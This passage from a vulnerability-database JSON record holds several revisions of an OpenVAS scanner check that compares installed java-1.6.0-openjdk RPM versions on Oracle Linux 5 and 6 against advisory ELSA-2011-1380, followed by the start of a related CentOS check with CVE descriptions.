rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "title": "Oracle Linux Local Check: ELSA-2011-1380", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:21:58"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "edition": 2, "enchantments": {}, "hash": "6189b58f7c97ed5ae14bcd312af2e6873730a6bae64d2937e11f1a9ac6534f8a", "hashmap": [{"hash": "08b23d2d7acff95e6d367430d3593874", "key": "href"}, {"hash": "9564b1250a06eb1a494ab04295d2334a", "key": "modified"}, {"hash": "705c9c6e3a07fe0b437680078dc3c313", "key": "references"}, {"hash": "8dd9465c1f750ba48cd8167f93b302ce", "key": "pluginID"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "64f508884fcbd4fda1d8563719289c2c", "key": "cvelist"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7ed6b2320916c7b97f13bf098c5ce691", "key": "title"}, {"hash": "6c7273b876815990be7a11dedfe50bea", "key": "sourceData"}, {"hash": "30c4194c368eb509b76e4c51d5fe867a", "key": "description"}, {"hash": "2996f7d445a5f86070564ef8302482c9", "key": "published"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "id": "OPENVAS:1361412562310122071", "lastseen": "2017-07-17T10:51:48", "modified": "2017-06-30T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310122071", "published": "2015-10-06T00:00:00", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2011-1380.nasl 6497 2017-06-30 09:58:54Z teissa $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\nscript_version(\"$Revision: 6497 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-06-30 11:58:54 +0200 (Fri, 30 Jun 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\nscript_tag(name: \"insight\", value: \"ELSA-2011-1380 - java-1.6.0-openjdk security update - [1:1.6.0.0-1.40.1.9.10]- Resolves: rhbz#744788- Bumped to IcedTea6 1.9.8-removed font copying Security fixes - S7000600, CVE-2011-3547: InputStream skip() information leak - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine - S7055902, CVE-2011-3521: IIOP deserialization code execution - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks - S7064341, CVE-2011-3389: JSSE - S7070134, CVE-2011-3558: Hotspot unspecified issue - S7077466, CVE-2011-3556: RMI DGC server remote code execution - S7083012, CVE-2011-3557: RMI registry privileged code execution - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection NetX - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\nscript_cve_id(\"CVE-2011-3389\",\"CVE-2011-3521\",\"CVE-2011-3544\",\"CVE-2011-3547\",\"CVE-2011-3548\",\"CVE-2011-3551\",\"CVE-2011-3552\",\"CVE-2011-3553\",\"CVE-2011-3554\",\"CVE-2011-3556\",\"CVE-2011-3557\",\"CVE-2011-3558\",\"CVE-2011-3560\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "title": "Oracle Linux Local Check: ELSA-2011-1380", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-07-17T10:51:48"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "edition": 1, "enchantments": {}, "hash": "8ddea61a0e8f4a060a71e3ca5b0e1c0baaf1dad264e2e10ef2a622d169e0a3e8", "hashmap": [{"hash": "08b23d2d7acff95e6d367430d3593874", "key": "href"}, {"hash": "705c9c6e3a07fe0b437680078dc3c313", "key": "references"}, {"hash": "8dd9465c1f750ba48cd8167f93b302ce", "key": "pluginID"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "451ccf9b33cae434b1236ed7a06114ec", "key": "modified"}, {"hash": "64f508884fcbd4fda1d8563719289c2c", "key": "cvelist"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "989e508539f226fe37552b777ffa8eff", "key": "sourceData"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7ed6b2320916c7b97f13bf098c5ce691", "key": "title"}, {"hash": "30c4194c368eb509b76e4c51d5fe867a", "key": "description"}, {"hash": "2996f7d445a5f86070564ef8302482c9", "key": "published"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "id": "OPENVAS:1361412562310122071", "lastseen": "2017-07-02T21:11:31", "modified": "2016-11-15T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310122071", "published": "2015-10-06T00:00:00", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2011-1380.nasl 4513 2016-11-15 09:37:48Z cfi $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\nscript_version(\"$Revision: 4513 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2016-11-15 10:37:48 +0100 (Tue, 15 Nov 2016) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\nscript_tag(name: \"insight\", value: \"ELSA-2011-1380 - java-1.6.0-openjdk security update - [1:1.6.0.0-1.40.1.9.10]- Resolves: rhbz#744788- Bumped to IcedTea6 1.9.8-removed font copying Security fixes - S7000600, CVE-2011-3547: InputStream skip() information leak - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine - S7055902, CVE-2011-3521: IIOP deserialization code execution - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks - S7064341, CVE-2011-3389: JSSE - S7070134, CVE-2011-3558: Hotspot unspecified issue - S7077466, CVE-2011-3556: RMI DGC server remote code execution - S7083012, CVE-2011-3557: RMI registry privileged code execution - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection NetX - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\nscript_cve_id(\"CVE-2011-3389\",\"CVE-2011-3521\",\"CVE-2011-3544\",\"CVE-2011-3547\",\"CVE-2011-3548\",\"CVE-2011-3551\",\"CVE-2011-3552\",\"CVE-2011-3553\",\"CVE-2011-3554\",\"CVE-2011-3556\",\"CVE-2011-3557\",\"CVE-2011-3558\",\"CVE-2011-3560\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_summary(\"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "title": "Oracle Linux Local Check: ELSA-2011-1380", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:11:31"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "64f508884fcbd4fda1d8563719289c2c"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "30c4194c368eb509b76e4c51d5fe867a"}, {"key": "href", "hash": "08b23d2d7acff95e6d367430d3593874"}, {"key": "modified", "hash": "e3fe0a23059307d9f79f162426695d44"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "8dd9465c1f750ba48cd8167f93b302ce"}, {"key": "published", "hash": "2996f7d445a5f86070564ef8302482c9"}, {"key": "references", "hash": "705c9c6e3a07fe0b437680078dc3c313"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}, {"key": "sourceData", "hash": "23b1d115aff71aabf2b53ba02e64204e"}, {"key": "title", "hash": "7ed6b2320916c7b97f13bf098c5ce691"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "8377bbd6e8c9aacf7adb3f3bdefbfefcd239adcaed5c67462922ea2e8eeed0f8", "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1380.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1380 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1380\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "1361412562310122071"}

{"openvas": [{"lastseen": "2018-09-02T00:00:13", "references": ["2011:1380", "http://lists.centos.org/pipermail/centos-announce/2011-October/018122.html"], "pluginID": "1361412562310881447", "description": "Check for the Version of java", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "title": "CentOS Update for java CESA-2011:1380 centos5 x86_64", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2011:1380 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform 